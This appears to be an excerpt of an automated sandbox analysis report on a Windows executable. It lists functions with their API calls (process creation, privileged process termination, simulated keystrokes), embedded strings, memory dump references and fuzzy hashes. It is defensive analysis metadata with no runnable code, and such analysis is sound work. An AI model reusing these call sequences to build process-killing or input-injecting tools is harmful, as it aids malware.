                                                Similarity
                                                • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                • String ID:
                                                • API String ID: 560350794-0
                                                • Opcode ID: 9ac218020f9de36117323ac204406b8e3d1d2c2c75ff43d676f6d3af42edde52
                                                • Instruction ID: 4dd59e867c60cf6fa60bc5efd18c7aa21244d51ac8df22f7ae4755afcf1f10dd
                                                • Opcode Fuzzy Hash: 9ac218020f9de36117323ac204406b8e3d1d2c2c75ff43d676f6d3af42edde52
                                                • Instruction Fuzzy Hash: E6F15D71A01209EFCF04DF95C888EAEB7BAFF49315F108099F919AB250DB35AE45CB51
                                                Function 007EF7A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • _memset.LIBCMT ref: 007EF7C9
                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007EF95C
                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007EF980
                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007EF9C0
                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007EF9E2
                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 007EFB5E
                                                • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 007EFB90
                                                • CloseHandle.KERNEL32(?), ref: 007EFBBF
                                                • CloseHandle.KERNEL32(?), ref: 007EFC36
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                • String ID:
                                                • API String ID: 4090791747-0
                                                • Opcode ID: bd72af33fd4a4e7f9a1472bedc07a7c35eef71cfcf752616dc3f2679b5cbeeaa
                                                • Instruction ID: f7ca8aa6216a94e61ad0306dbad03b82fe37afd5205c90014bac480b313b70a0
                                                • Opcode Fuzzy Hash: bd72af33fd4a4e7f9a1472bedc07a7c35eef71cfcf752616dc3f2679b5cbeeaa
                                                • Instruction Fuzzy Hash: 06E1C031205341DFCB14EF25C885B6ABBE5AF88354F14846DF9899B3A2DB38EC41CB52
                                                Function 007D4D68 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 007D46AF: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007D36DB,?), ref: 007D46CC
                                                  • Part of subcall function 007D46AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007D36DB,?), ref: 007D46E5
                                                  • Part of subcall function 007D4AD8: GetFileAttributesW.KERNEL32(?,007D374F), ref: 007D4AD9
                                                • lstrcmpiW.KERNEL32(?,?), ref: 007D4DE7
                                                • _wcscmp.LIBCMT ref: 007D4E01
                                                • MoveFileW.KERNEL32(?,?), ref: 007D4E1C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                • String ID:
                                                • API String ID: 793581249-0
                                                • Opcode ID: 0bafd056ec81b133358b3b2c728aae1fb99f9b2fc989a00e8edc2cdb6c7738bb
                                                • Instruction ID: 8217572f056fafa5fbe7fce61eb90e894b4a0c659172b609606645e390fb0b75
                                                • Opcode Fuzzy Hash: 0bafd056ec81b133358b3b2c728aae1fb99f9b2fc989a00e8edc2cdb6c7738bb
                                                • Instruction Fuzzy Hash: E35144B2408784ABC724EB90D8859DFB7FCAF85340F14492FF68993251EF38A5498756
                                                Function 007F8677 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                Download Yara Rule
                                                APIs
                                                • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 007F8731
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: InvalidateRect
                                                • String ID:
                                                • API String ID: 634782764-0
                                                • Opcode ID: dd73c57e68f8f1484bebb1f0c692200374e06649f23562f07b67d078089ed723
                                                • Instruction ID: 0119c3e9fe85d6508851f63424240ba0f16ea4dd5bdce4f9f06fd11100b7cf66
                                                • Opcode Fuzzy Hash: dd73c57e68f8f1484bebb1f0c692200374e06649f23562f07b67d078089ed723
                                                • Instruction Fuzzy Hash: 4B51B170610208FAEF609B69CC89BB93B64FB05360F604515FB15E63E2CF79E990DB52
                                                Function 00772B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 007AC477
                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 007AC499
                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 007AC4B1
                                                • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 007AC4CF
                                                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 007AC4F0
                                                • DestroyIcon.USER32(00000000), ref: 007AC4FF
                                                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 007AC51C
                                                • DestroyIcon.USER32(?), ref: 007AC52B
                                                  • Part of subcall function 007FA4E1: DeleteObject.GDI32(00000000), ref: 007FA51A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                • String ID:
                                                • API String ID: 2819616528-0
                                                • Opcode ID: fa33ae8c29b9d6d8e0ce1e6d0dde209542b47c662083cdfd551b3f4a89031c7f
                                                • Instruction ID: fe35bfdbab98da90232bca4a677cd87fa12b0bf6d6880a6358641740a3fde51c
                                                • Opcode Fuzzy Hash: fa33ae8c29b9d6d8e0ce1e6d0dde209542b47c662083cdfd551b3f4a89031c7f
                                                • Instruction Fuzzy Hash: 2B517A70A00209EFDF21DF24CC45BBA3BA5FF58350F108628F916972A1DB78AD91DB64
                                                Function 007C9930 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 007CAC37: GetWindowThreadProcessId.USER32(?,00000000), ref: 007CAC57
                                                  • Part of subcall function 007CAC37: GetCurrentThreadId.KERNEL32 ref: 007CAC5E
                                                  • Part of subcall function 007CAC37: AttachThreadInput.USER32(00000000,?,007C9945,?,00000001), ref: 007CAC65
                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 007C9950
                                                • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 007C996D
                                                • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 007C9970
                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 007C9979
                                                • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 007C9997
                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 007C999A
                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 007C99A3
                                                • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 007C99BA
                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 007C99BD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                • String ID:
                                                • API String ID: 2014098862-0
                                                • Opcode ID: 476a8f991cc2744cc94ff0136d0098198a9fb1a0a36fc65c986f69cfc67894b7
                                                • Instruction ID: 0894aaaaf430fee845cdcc69c0f73d7a7cf657c62b67fe2642c85884bdce2064
                                                • Opcode Fuzzy Hash: 476a8f991cc2744cc94ff0136d0098198a9fb1a0a36fc65c986f69cfc67894b7
                                                • Instruction Fuzzy Hash: 3A11CE71950218FEF7206B60CC8DFAA7B2DEF4C755F104429F644AB1A0CDFA6C10DAA8
                                                Function 007C8BE3 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,007C8864,00000B00,?,?), ref: 007C8BEC
                                                • HeapAlloc.KERNEL32(00000000,?,007C8864,00000B00,?,?), ref: 007C8BF3
                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,007C8864,00000B00,?,?), ref: 007C8C08
                                                • GetCurrentProcess.KERNEL32(?,00000000,?,007C8864,00000B00,?,?), ref: 007C8C10
                                                • DuplicateHandle.KERNEL32(00000000,?,007C8864,00000B00,?,?), ref: 007C8C13
                                                • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,007C8864,00000B00,?,?), ref: 007C8C23
                                                • GetCurrentProcess.KERNEL32(007C8864,00000000,?,007C8864,00000B00,?,?), ref: 007C8C2B
                                                • DuplicateHandle.KERNEL32(00000000,?,007C8864,00000B00,?,?), ref: 007C8C2E
                                                • CreateThread.KERNEL32(00000000,00000000,007C8C54,00000000,00000000,00000000), ref: 007C8C48
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                • String ID:
                                                • API String ID: 1957940570-0
                                                • Opcode ID: 64ce08f6ef4f2c64b93c63c0229cb3fec947965c31de5e0e6e382ede4747ed79
                                                • Instruction ID: e9b96fa706caad9c9cb9fcc8fbdca064973e52a0647753443b1489dae6da3f82
                                                • Opcode Fuzzy Hash: 64ce08f6ef4f2c64b93c63c0229cb3fec947965c31de5e0e6e382ede4747ed79
                                                • Instruction Fuzzy Hash: 9B01ACB5240348FFE610AB65DC89F6B3B6CEF89711F008421FA05DB291CA749810DA24
                                                Function 007E9C38 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: NULL Pointer assignment$Not an Object type
                                                • API String ID: 0-572801152
                                                • Opcode ID: 6b2179a7ee7e39a7b0003b9df5acc1133c317f043e000ea7a3f4c96ad09fef2d
                                                • Instruction ID: 797bd7a0d1cbdd29e5120c68d30d1ba500a923bde5d10161278572f762dec35d
                                                • Opcode Fuzzy Hash: 6b2179a7ee7e39a7b0003b9df5acc1133c317f043e000ea7a3f4c96ad09fef2d
                                                • Instruction Fuzzy Hash: 7CC19172A01259AFDF10DFA9C884BEEB7B5FF48314F148429EA15E7280E7789D41CB60
                                                Function 007E9228 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Variant$ClearInit$_memset
                                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                • API String ID: 2862541840-625585964
                                                • Opcode ID: 13549b7c86f398a020bec23ea36678570b5b1730a09fce6296643d7d618e1a65
                                                • Instruction ID: bd092cc6bab40026e139807d43f76d8810696ba66896650be1449639ca4add07
                                                • Opcode Fuzzy Hash: 13549b7c86f398a020bec23ea36678570b5b1730a09fce6296643d7d618e1a65
                                                • Instruction Fuzzy Hash: E891B172A01255EBDF20DFA6C848FAFB7B8EF49310F108559F615AB280D7789945CBA0
                                                Function 007E9872 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 007C7432: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007C736C,80070057,?,?,?,007C777D), ref: 007C744F
                                                  • Part of subcall function 007C7432: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007C736C,80070057,?,?), ref: 007C746A
                                                  • Part of subcall function 007C7432: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007C736C,80070057,?,?), ref: 007C7478
                                                  • Part of subcall function 007C7432: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007C736C,80070057,?), ref: 007C7488
                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 007E991B
                                                • _memset.LIBCMT ref: 007E9928
                                                • _memset.LIBCMT ref: 007E9A6B
                                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 007E9A97
                                                • CoTaskMemFree.OLE32(?), ref: 007E9AA2
                                                Strings
                                                • NULL Pointer assignment, xrefs: 007E9AF0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                • String ID: NULL Pointer assignment
                                                • API String ID: 1300414916-2785691316
                                                • Opcode ID: b5ae0f9ad9ca56b584fc5ded2bef42da9c7a52b5d5bfbf1fca7d221d4637eecb
                                                • Instruction ID: cc5f7c793765bf18d0ac58ed7c07170e6de366321ea93a8bdf0dc5753361e8d1
                                                • Opcode Fuzzy Hash: b5ae0f9ad9ca56b584fc5ded2bef42da9c7a52b5d5bfbf1fca7d221d4637eecb
                                                • Instruction Fuzzy Hash: 47912872D01218EBDF10DFA5DC85ADEBBB9EF08750F10816AF519A7241DB749A44CFA0
                                                Function 007F6DB2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 007F6E56
                                                • SendMessageW.USER32(?,00001036,00000000,?), ref: 007F6E6A
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 007F6E84
                                                • _wcscat.LIBCMT ref: 007F6EDF
                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 007F6EF6
                                                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 007F6F24
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window_wcscat
                                                • String ID: SysListView32
                                                • API String ID: 307300125-78025650
                                                • Opcode ID: 0d16c029443fd035349a85c650868b4591141f2eb7275f22ed5f37af9d00372b
                                                • Instruction ID: ea015cb855274c265b55defd1970399aab71cfd897392adcd5ee8c4a98918ee0
                                                • Opcode Fuzzy Hash: 0d16c029443fd035349a85c650868b4591141f2eb7275f22ed5f37af9d00372b
                                                • Instruction Fuzzy Hash: A5419D75A00208EBEF219F64CC89BFA77F8EF08350F10446AF644E7291D6799D84CB64
                                                Function 007EEA47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 007D3C99: CreateToolhelp32Snapshot.KERNEL32 ref: 007D3CBE
                                                  • Part of subcall function 007D3C99: Process32FirstW.KERNEL32(00000000,?), ref: 007D3CCC
                                                  • Part of subcall function 007D3C99: CloseHandle.KERNEL32(00000000), ref: 007D3D96
                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007EEAB8
                                                • GetLastError.KERNEL32 ref: 007EEACB
                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007EEAFA
                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 007EEB77
                                                • GetLastError.KERNEL32(00000000), ref: 007EEB82
                                                • CloseHandle.KERNEL32(00000000), ref: 007EEBB7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                • String ID: SeDebugPrivilege
                                                • API String ID: 2533919879-2896544425
                                                • Opcode ID: be2668fff5ce6dacb970b687e2c5d2be908f3fc4f5d14e50029f643da14345ae
                                                • Instruction ID: 014d2ebc86e070dad06ccae65208bd60c849f110653aafb13b72d81d8b0cdee4
                                                • Opcode Fuzzy Hash: be2668fff5ce6dacb970b687e2c5d2be908f3fc4f5d14e50029f643da14345ae
                                                • Instruction Fuzzy Hash: 3D418B71201201DFDB14EF15CC99F6DB7A5AF84714F08846DFA469B3D2DB78A804CB96
                                                Function 007D302E Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadIconW.USER32(00000000,00007F03), ref: 007D30CD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: IconLoad
                                                • String ID: blank$info$question$stop$warning
                                                • API String ID: 2457776203-404129466
                                                • Opcode ID: 65f1f6002ecc6088cfc52d7c299ecc54e245bf9a9ce0a112d3aea80ef186e3bd
                                                • Instruction ID: a102e381d7dfc42d9b8f2db7acf2e67c5bbe9ec90ccc34163ab52413d8923798
                                                • Opcode Fuzzy Hash: 65f1f6002ecc6088cfc52d7c299ecc54e245bf9a9ce0a112d3aea80ef186e3bd
                                                • Instruction Fuzzy Hash: 9D110D35609357FAEB205B58EC82D7A77BDDF05360F10402BF50596381DEBD5F4085A6
                                                Function 007D4339 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 007D4353
                                                • LoadStringW.USER32(00000000), ref: 007D435A
                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 007D4370
                                                • LoadStringW.USER32(00000000), ref: 007D4377
                                                • _wprintf.LIBCMT ref: 007D439D
                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 007D43BB
                                                Strings
                                                • %s (%d) : ==> %s: %s %s, xrefs: 007D4398
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: HandleLoadModuleString$Message_wprintf
                                                • String ID: %s (%d) : ==> %s: %s %s
                                                • API String ID: 3648134473-3128320259
                                                • Opcode ID: 658b30f13582243230f1ef81489ff73a5cc25e52f80e29a5c21572c48e95eef5
                                                • Instruction ID: a2ea211946ef8a577954153bd208fdd9f5970d600f1ac96c117177880536e1e7
                                                • Opcode Fuzzy Hash: 658b30f13582243230f1ef81489ff73a5cc25e52f80e29a5c21572c48e95eef5
                                                • Instruction Fuzzy Hash: CB0162F290020CBFEB119BA4DD89EF6776CDB08301F0045A6F705E2151EE789E858B79
                                                Function 007FD4A8 Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00772612: GetWindowLongW.USER32(?,000000EB), ref: 00772623
                                                • GetSystemMetrics.USER32(0000000F), ref: 007FD4E6
                                                • GetSystemMetrics.USER32(0000000F), ref: 007FD506
                                                • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 007FD741
                                                • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 007FD75F
                                                • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 007FD780
                                                • ShowWindow.USER32(00000003,00000000), ref: 007FD79F
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 007FD7C4
                                                • DefDlgProcW.USER32(?,00000005,?,?), ref: 007FD7E7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                • String ID:
